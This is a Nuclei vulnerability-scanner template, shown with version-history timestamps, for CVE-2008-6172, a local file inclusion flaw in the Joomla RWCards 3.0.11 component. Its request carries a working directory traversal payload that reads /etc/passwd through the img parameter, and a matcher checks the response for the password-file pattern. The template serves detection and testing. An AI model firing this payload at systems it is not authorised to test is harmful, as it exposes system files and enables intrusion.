nuclei-templates/cves/2008/CVE-2008-6172.yaml

33 lines
999 B
YAML
Raw Normal View History

2021-08-15 23:23:06 +00:00
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
2022-01-27 19:23:33 +00:00
remediation: Upgrade to the latest version.
reference:
2021-08-15 23:23:06 +00:00
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
2021-08-16 08:31:20 +00:00
tags: cve,cve2008,joomla,lfi
2022-01-27 19:31:57 +00:00
classification:
cve-id: CVE-2008-6172
2021-08-15 23:23:06 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/01/27